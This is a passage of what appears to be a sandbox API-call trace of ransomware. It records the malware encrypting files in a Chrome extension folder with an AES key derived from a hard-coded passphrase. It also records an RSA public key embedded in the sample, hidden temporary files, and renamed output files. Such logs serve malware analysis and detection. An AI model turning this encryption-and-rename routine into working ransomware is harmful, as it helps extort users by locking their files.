lpOverlapped=0x0) returned 1 [0264.527] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.527] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.527] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.527] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.527] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.527] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.536] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.536] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.536] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.537] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.537] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.537] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.537] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x299, lpOverlapped=0x0) returned 1 [0264.537] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x299, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x2a0) returned 1 [0264.537] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x2a0, lpOverlapped=0x0) returned 1 [0264.537] CloseHandle (hObject=0x5d64) returned 1 [0264.537] CloseHandle (hObject=0x5d60) returned 1 [0264.537] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0264.556] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0264.556] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.gsg")) returned 1 [0264.558] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.fuck")) returned 1 [0264.560] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0264.560] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0264.560] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0264.560] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0264.560] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0264.560] GetLastError () returned 0x0 [0264.560] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json")) returned 0x20 [0264.560] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0264.561] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0264.562] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0264.563] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0264.563] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x2e7a500) returned 1 [0264.566] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0264.566] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0264.566] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0264.566] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2e7da00) returned 1 [0264.566] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----c", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0264.566] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0264.566] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2e75d48) returned 1 [0264.567] CryptImportPublicKeyInfo (in: hCryptProv=0x2e75d48, dwCertEncodingType=0x1, pInfo=0x2eaec80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaecb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaecb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2e7f0c0) returned 1 [0264.567] CryptEncrypt (in: hKey=0x2e7f0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0264.567] CryptEncrypt (in: hKey=0x2e7f0c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e76320*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2e76320*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0264.567] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e76320*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2e76320*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0264.568] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.579] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.579] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.581] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.581] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.581] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.582] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.582] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.582] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.582] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.582] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.583] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.583] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.583] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.583] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.583] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.583] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.584] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.584] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.584] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.584] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.584] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.585] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0264.585] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.585] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0264.585] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 